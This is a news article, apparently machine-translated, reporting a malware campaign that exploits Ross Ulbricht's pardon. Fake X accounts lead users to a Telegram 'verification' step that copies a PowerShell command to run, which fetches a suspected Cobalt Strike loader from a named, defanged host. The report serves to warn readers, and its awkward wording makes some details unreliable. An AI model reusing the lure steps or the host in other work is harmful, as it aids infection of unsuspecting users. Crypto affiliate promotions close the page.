Ross Ulbricht, the controversial creator of the Silk Road, has long been at the center of discussions about the intersection between technology and criminal activity. Following a full pardon from US President Donald Trump, a new wave of cybercrime has emerged, taking advantage of news of the Ulbricht case to deliver malware to unexpected targets.
Taking advantage of the news surrounding it, X threat actors redirect users to a Telegram channel where they are tricked into running PowerShell scripts that infect their devices with malware.
Ross Ulbricht’s malicious campaign
According to the latest findings of researchers at vx-underground to updateThe attack uses a new variation of the popular “Click-Fix” tactic, but with a twist. Instead of disguising itself as a popular bug fix, this version pretends to be a CAPTCHA or verification process required to join a channel.
In this case, cybercriminals impersonate Ulbricht by using fake but verified accounts on X to lure users to Telegram channels that falsely claim to be official. Once on Telegram, users encounter a “Safeguard” identity verification scam, which leads them to an applet that creates a fake verification dialog and automatically copies a PowerShell command to their clipboard.
Users are then directed to run the command via the Windows Run dialog box. As such, the execution of the order triggers a chain of events. First, it downloads a PowerShell script, which retrieves the ZIP file from http://openline[.]cyou. The zip file contains several files, including the identity file helper.exe, which is suspected to be the Cobalt Strike loader – a tool frequently used by attackers for remote access and launching ransomware or data theft campaigns.
The entire process has been carefully crafted to avoid detection.
Ross Ulbricht released
This development comes after Ulbricht was pardoned and released this week after being imprisoned since 2013 on charges of founding and operating the popular dark web marketplace Silk Road.
Silk Road was an online marketplace on the Tor network that allowed people to trade illegal substances, such as drugs. Ulbricht operated the site using the alias “Dread Pirate Roberts”. The FBI arrested him in October 2013 and shut down the website.
In 2015, Ulbricht was convicted on charges including drug distribution and money laundering. He was sentenced to life in prison without the possibility of parole, and his appeals were rejected in 2017 and 2018.
Free Binance $600 (Exclusively for CryptoPotato): Use this link to register a new account and get an exclusive $600 welcome offer on Binance (full details).
Limited offer for CryptoPotato readers at Bybit: Use this link to register and open a free $500 position on any coin!
